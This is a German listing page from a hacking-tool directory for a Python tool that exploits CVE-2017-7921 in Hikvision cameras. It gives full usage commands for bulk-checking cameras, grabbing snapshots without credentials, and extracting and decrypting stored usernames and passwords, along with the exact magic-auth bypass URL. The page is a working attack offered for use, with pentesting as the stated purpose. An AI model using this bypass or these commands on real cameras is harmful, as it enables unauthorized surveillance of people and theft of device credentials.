Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/mverschu/cve-2017-7921
AufklärungIoT-SicherheitPasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungAuthentifizierung
GitHubmverschu/cve-2017-7921

CVE-2017-7921

HikVision Auth Bypass CVE, das Tool kann Anmeldeinformationen extrahieren und Schnappschüsse basierend auf Magic Cookie oder bereitgestellten Anmeldeinformationen erstellen.

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
CVE-2017-7921 — HikVision Auth Bypass CVE, das Tool kann Anmeldeinformationen extrahieren und Schnappschüsse basierend auf Magic Cookie oder bereitgestellten Anmeldeinformationen erstellen. | Kitploit

Hikvision Kamera-Listener & Snapshot-Tool

Eigenständiges Tool zum Auflisten von Hikvision-Kameras aus einer Datei und zum Erstellen eines Snapshots von jeder Kamera unter Verwendung gültiger Anmeldedaten (HTTP Basic- oder Digest-Auth) oder des CVE-Auth-Bypass. Gedacht zum Ausführen auf einem anderen Host zum Testen.

Funktionen

  • Kameras auflisten aus einer Textdatei (eine host oder host:port pro Zeile).
  • Prüfen (CVE) – Testen jeder Kamera auf den magischen Auth-Bypass CVE (keine Anmeldedaten); optional --save-snapshot für anfällige Geräte.
  • Anmeldedaten – Extraktion von Benutzername/Passwort von jeder Kamera über CVE (magischer Auth + Config-Entschlüsselung). Erfordert OpenSSL.
  • Auth-Prüfung – Überprüfen, ob Benutzername/Passwort von jeder Kamera akzeptiert werden (keine Snapshots gespeichert).
  • Alle Snapshots – Ruft ein Bild pro Kamera ab (gültige Anmeldedaten oder --exploit zur Verwendung des CVE-Bypass ohne Anmeldedaten).
  • Gleichzeitige Anfragen (konfigurierbare Worker).
  • Optionale HTTP-Digest-Auth; optional --merge zum Erstellen eines Übersichtsbildes. Abhängigkeiten: requests, Pillow (für --merge).

Voraussetzungen

  • Python 3.8+
  • requests

Installation

root@kitploit:~
pip install -r requirements.txt

Kameralisten-Datei

Erstellen Sie eine Textdatei mit einer Kamera pro Zeile. Kommentare mit # werden ignoriert.

root@kitploit:~
# Example cameras.txt
192.168.1.100
192.168.1.101:80
nvr.local:8080

Verwendung

Kameras auflisten

Gibt die aus der Datei gelesenen Kameras aus (keine Anmeldedaten erforderlich).

root@kitploit:~
python hikvision_snapshots.py cameras.txt list

Optionale Erreichbarkeitsprüfung (HTTP GET zu jedem Host):

root@kitploit:~
python hikvision_snapshots.py cameras.txt list -v

Prüfen (CVE)

Testet jede Kamera auf den Hikvision Snapshot-Auth-Bypass CVE. Keine Anmeldedaten erforderlich.

root@kitploit:~
python hikvision_snapshots.py cameras.txt check

Speichert Snapshots nur für anfällige Kameras:

root@kitploit:~
python hikvision_snapshots.py cameras.txt check --save-snapshot -o ./vuln_snapshots

Optionen: --timeout, --workers, -o (für --save-snapshot).

Anmeldedaten (extrahieren)

Extrahiert Anmeldedaten von jeder Kamera über den CVE (magischer Auth zum Abrufen der Benutzerliste und Konfigurationsdatei, dann Entschlüsselung der Konfiguration). Erfordert OpenSSL auf dem Host. Keine Anmeldedaten zum Ausführen erforderlich.

root@kitploit:~
python hikvision_snapshots.py cameras.txt credentials

Optionen: --timeout, --workers.

Auth-Prüfung

Überprüft, ob Ihre Anmeldedaten auf jeder Kamera funktionieren (verwendet dieselben Snapshot-Endpunkte; speichert keine Bilder).

root@kitploit:~
python hikvision_snapshots.py cameras.txt auth-check -u admin -p YourPassword

Optionen: --timeout, --workers, --digest (wie bei Snapshot).

Snapshot aller Kameras

Erstellt einen Snapshot pro Kamera und speichert als JPEG. Verwenden Sie entweder gültige Anmeldedaten oder --exploit (CVE-Auth-Bypass, keine Anmeldedaten).

root@kitploit:~
# With credentials
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword

# With CVE exploit (no credentials)
python hikvision_snapshots.py cameras.txt snapshot --exploit
  • Snapshots werden standardmäßig unter snapshots/ gespeichert (mit -o änderbar).
  • Dateinamen werden von host oder host_port abgeleitet (z.B. 192_168_1_100.jpg, nvr_local_8080.jpg).

Optionen:

Mit --merge erstellt das Tool nach dem Speichern jedes Snapshots ein einzelnes Gitterbild (overview.jpg) im Ausgabeverzeichnis mit einer Zelle pro Kamera und einer Beschriftung. Erfordert Pillow (pip install Pillow).

Beispiel mit benutzerdefinierter Ausgabe und Digest-Auth:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p secret -o ./images --digest --timeout 20

Beispiel mit zusammengeführter Übersicht:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword --merge
# or with exploit (no creds):
python hikvision_snapshots.py cameras.txt snapshot --exploit --merge -o ./out

Endpunkte

Authentifizierter Snapshot (mit Anmeldedaten): Das Skript versucht der Reihe nach – /ISAPI/Streaming/channels/1/picture, /ISAPI/Streaming/channels/101/picture, /onvif-http/snapshot.

CVE (check / --exploit): /onvif-http/snapshot?auth=YWRtaW46MTEK (magischer Auth-Bypass, keine Anmeldedaten).

Ausführen auf einem anderen Host

  1. Kopieren Sie hikvision_snapshots.py, requirements.txt und Ihre Kameralisten-Datei auf den Host.
  2. Installieren: pip install -r requirements.txt
  3. Führen Sie list aus, um die Datei zu überprüfen; verwenden Sie check für CVE, auth-check für Anmeldedaten oder snapshot (mit -u/-p oder --exploit).

Stellen Sie sicher, dass der Host Netzwerkzugriff auf alle Kamera-IPs und Ports hat.

Tool herunterladen
OptionDescriptionDefault
-u, --usernameKamera-Benutzernameerforderlich, außer bei --exploit
-p, --passwordKamera-Passworterforderlich, außer bei --exploit
--exploitCVE-magischen Auth-Bypass verwenden (keine Anmeldedaten)aus
-o, --output-dirVerzeichnis für Snapshot-Bildersnapshots
--timeoutHTTP-Timeout in Sekunden15
--workersAnzahl gleichzeitiger Snapshot-Anfragen10
--digestHTTP-Digest-Auth anstelle von Basic verwendenaus
--mergeAlle Snapshots zu einem Übersichtsbild zusammenführenaus
--merge-columnsGitterspalten für Merge (Standard: auto)auto